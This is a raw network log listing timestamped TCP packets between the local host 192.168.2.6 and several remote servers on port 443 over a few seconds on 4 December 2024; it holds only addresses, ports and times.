                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.306145906 CET44350029162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.339344978 CET50029443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.339776039 CET50030443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.339812994 CET44350030172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.387331009 CET44350029162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.469902039 CET50030443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.484489918 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.545090914 CET44350026159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.545155048 CET50026443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.545176029 CET44350026159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.545289993 CET50026443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.555187941 CET50031443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.555207968 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.556490898 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.556507111 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.556559086 CET50031443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.566565037 CET50031443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.566728115 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.567049980 CET50031443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.567063093 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.569112062 CET50026443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.569142103 CET44350026159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.631243944 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.631294012 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.631366014 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.633968115 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.633985043 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.769866943 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.769937992 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.770003080 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.770498991 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.770508051 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.779331923 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.779381037 CET50031443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784070969 CET44350030172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784147024 CET44350030172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784312963 CET44350029162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784382105 CET50030443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784418106 CET44350029162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784473896 CET50029443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784570932 CET50030443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.784595013 CET44350030172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.785003901 CET50029443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.785023928 CET44350029162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.970763922 CET50057443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.970818043 CET44350057162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.971236944 CET50057443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.971236944 CET50057443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.971273899 CET44350057162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.996109009 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.996185064 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.996231079 CET50031443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.996469975 CET50031443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:19.996485949 CET44350031162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.045360088 CET44350050162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.045638084 CET50050443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.045655012 CET44350050162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.045917988 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.046248913 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.046271086 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.048170090 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.048230886 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.048664093 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.048902988 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.049381971 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.049494982 CET44350051172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.050307989 CET50051443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.050318003 CET44350051172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.051978111 CET44350050162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.052037954 CET50050443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.053580046 CET50050443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.053669930 CET44350050162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.054069042 CET44350051172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.054166079 CET50051443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.054857969 CET50051443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.055145025 CET50051443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.055257082 CET44350051172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.075280905 CET50050443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.075321913 CET44350050162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.075413942 CET50050443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.078958988 CET50049443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.079365015 CET50043443192.168.2.618.165.220.106
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.081286907 CET50058443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.081322908 CET44350058162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.081397057 CET50058443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.081423044 CET50057443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.081830978 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.081854105 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.082070112 CET50060443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.082098961 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.082101107 CET44350060162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.082490921 CET50060443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.083233118 CET50058443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.083250999 CET44350058162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.083350897 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.083365917 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.083961010 CET50060443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.083980083 CET44350060162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.084625006 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.084712982 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.085376978 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.085385084 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087387085 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087393045 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087449074 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087462902 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087521076 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087521076 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087526083 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087542057 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087558985 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087570906 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087594986 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087608099 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087639093 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087651968 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087681055 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087723970 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.087774038 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.088659048 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.088835001 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.088867903 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.088886976 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.088895082 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.088998079 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.089013100 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.089171886 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.089180946 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.119344950 CET44350049142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.123326063 CET44350057162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.123342037 CET4435004318.165.220.106192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.156907082 CET50051443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.156920910 CET44350051172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.159658909 CET50051443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.159790993 CET44350051172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.159873009 CET50051443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.204951048 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.204962015 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.387478113 CET4435004318.165.220.106192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.387583971 CET4435004318.165.220.106192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.387665987 CET50043443192.168.2.618.165.220.106
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.387665987 CET50043443192.168.2.618.165.220.106
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.392872095 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393313885 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393351078 CET44350061172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393493891 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393498898 CET50062443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393534899 CET44350062172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393579960 CET50062443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393917084 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393927097 CET44350063172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.393974066 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394140005 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394171953 CET44350064172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394315004 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394329071 CET44350061172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394339085 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394468069 CET50062443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394481897 CET44350062172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394552946 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394565105 CET44350063172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394651890 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.394661903 CET44350064172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.629650116 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.629725933 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.629770041 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.630707979 CET50047443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.630728960 CET44350047162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.859210968 CET44350049142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.859285116 CET50049443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.090137005 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.090209961 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.091450930 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.091495991 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.091543913 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.092577934 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.092588902 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.094104052 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.094113111 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096365929 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096379995 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096425056 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096436024 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096461058 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096467018 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096493959 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096498013 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096573114 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096584082 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096628904 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096640110 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096713066 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096731901 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096750975 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.096757889 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.188045025 CET44350057162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.188106060 CET50057443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.346493006 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.346750021 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.346765995 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.347121000 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.348165989 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.348246098 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.348433018 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.391328096 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.395037889 CET44350058162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.395262003 CET50058443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.395283937 CET44350058162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.395637989 CET44350058162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.396636963 CET50058443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.396893024 CET44350060162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.397073984 CET50060443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.397092104 CET44350060162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.397119045 CET44350058162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.402801037 CET44350060162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.403975964 CET50060443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.404057026 CET44350060162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.536052942 CET50060443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.602675915 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.603332996 CET44350058162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.603964090 CET50058443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.604819059 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.604840040 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.605865955 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.605875015 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.606075048 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.606089115 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.698766947 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.698815107 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.698903084 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.699121952 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.699130058 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.799663067 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.801526070 CET44350059162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.801599026 CET50059443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.847341061 CET44350064172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.848397970 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.848413944 CET44350064172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.849477053 CET44350064172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.849530935 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.850655079 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.851747036 CET44350064172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.852993011 CET44350063172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.856702089 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.856733084 CET44350063172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.864799976 CET44350063172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.864857912 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.866065025 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.867244959 CET44350063172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.895668030 CET44350061172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.898607969 CET44350062172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.918572903 CET50062443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.918611050 CET44350062172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.919254065 CET44350062172.64.41.3192.168.2.6
